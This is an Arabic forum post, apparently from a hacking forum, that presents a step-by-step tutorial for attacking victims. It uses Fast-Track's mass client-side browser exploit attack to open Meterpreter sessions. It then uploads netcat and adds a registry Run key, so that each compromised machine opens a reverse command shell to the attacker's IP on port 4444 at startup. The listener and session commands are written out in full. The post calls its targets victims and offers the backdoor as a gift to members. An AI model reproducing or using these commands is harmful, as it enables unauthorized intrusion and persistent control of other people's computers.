بسم الله الرحمن الرحيم السلام عليكم ورحمة الله وبركاته .. كيف حالك اعضاء منتديات جيوش الهكر وجدتت لكم اليوم في موقع اجنبي شرح لــــ بعض ثغرات المتصفح وراح نستخدم الادوات : M3tasploit , Fast-track ندخل في صلب الموضوع .. طبعا المكتوب واضح من عنوانه .. راح نستخدم اداة الفاست تراك في تطبيق هجوم الـ Client-side طيب ممكن واحد يسأل شو يعني ؟ باختصار شديد .. هو تجميع اكبر عدد ممكن من الاكسبلويتات الموجودة بالميتاسبلويت في وقت واحد و في ايفريم واحد على سيرفر محلي .. طيب ندخل على التيرمنال .. بوضعية الجذر و نكتب الامر لدخول مجلد الفاست تراك كود: cd/pentest/exploits/fasttrack لو تستعرض الملفات الموجودة بالمجلد .. بتلقى سكربت الفاست تراك بلغة البايثون .. طيب نشغله بالامر .. كود: ./fast-track.py -i (-i) تعني تشغيل السكربت داخل التيرمنال .. الان بيطلع لنا عدة خيارات ممكن تنفذها .. و كل مهمة لها رقم محدد ... هجومنا المطلوب اسمه (Mass Client-Side Attack ) و رقمه (4) .. يعني نحدده بالرقم (4) من ثم بيطلب منك السكربت وضع الاي بي اللي راح يكون سيرفر للتنصت عليه ( الاي بي تبعك طبعا ) من ثم بيعرض لك 4 بايلودات تختار منها اللي تبي .. يفضل (Meterpreter) لان راح نستخدمه بعد شوي لسهولته .. ثم بيسالك اذا تبي تعمل ارب بويزنينج اطلب منه لا .. الان الاداة تقوم بعملها و تجميع الثغرات الممكن و بدأ السيرفر .. ننتظر الى ان تنتهي .. بكملة Server started بامكانك عمل سبوفينج بالسيرفر (سأقوم بوضع شرح لها قريبا في قسم الثغرات) عموما .. الان نفرض لقطنا الضحية بيخبرك ان فيه جلسة جديدة مفتوحة .. ندخل لها بالامر كود: sessions -i 1 (1) يعني رقم الجلسة .. الان امامك الضحية .. و يمكنك تتحكم فيه تحكم كامل ------------------------------------------------------------------------------------------------------------------------------------------------------------ المـــــــــــــــــــــف اجئة سأقدم اليوم مفاجأة لأعضاء الجيوش : المفاجئة يا طويل العمر هي استخدام النت كات كـ Backdoor يتم حقنه بالرجيستري ليتنصت على الاي بي تبعنا داخل مجلد بدء التشغيل .. اولا: نرفع النت كات الى على هالمسار داخل جهاز الضحية .. كود: upload /tmp/nc***** C:\\windows\\system32\\nc***** الان ندخل على موجه الاوامر تبع الضحية .. كود: execute -c -H -f cmd***** -i وش السواة الحين ؟ امر بسيط لحقن مفتاح ريجيستري بهالقيمة .. nc -d -e cmd***** 192.168.1.3 4444 مع التغيير للاي بي تبعك .. و المقصود بهالامر تنفيذ التنصت خلال بداية التشغيل بوضعية موجه الاوامر .. و هذا هو الامر كامل كود: reg add hklm\software\microsoft\windows\currentversion\run systemfile /t reg_sz /d "nc -d -e cmd***** 192.168.1.3 4444"/ reg add : واضح .. امر بدائي لاضافة اي مفتاح . hklm : و تعني مجلد HKEY_LOCAL_MACHINE . /v : و تعني اسم المفتاح و انا هنا موهت بالاسم systemfile /t : و تعني نوع المفتاح و في الاغلب يكون reg_sz /d : و هنا تتلخص الزبدة تبعنا .. و هي البيانات المطلوبة و هذي بيناتنا n c -d -e cmd***** 192.168.1.3 4444 الان و بعد زرع المفتاح .. نروح للتيرمنال و ونتنصت على البورت 4444 .. كود: nc -vlp 4444 و الضحية راح يشبك معك يوميا .. وأنا اسف ممكن ايكون الموضوع صعب كثيير على المبتدئين ... شرح عملي وهذا الفيديو : <strong> لكم تحياتي ...
cd/pentest/exploits/fasttrack
./fast-track.py -i
sessions -i 1
upload /tmp/nc***** C:\\windows\\system32\\nc*****
execute -c -H -f cmd***** -i
reg add hklm\software\microsoft\windows\currentversion\run systemfile /t reg_sz /d "nc -d -e cmd***** 192.168.1.3 4444"/
nc -vlp 4444
قوانين المنتدى
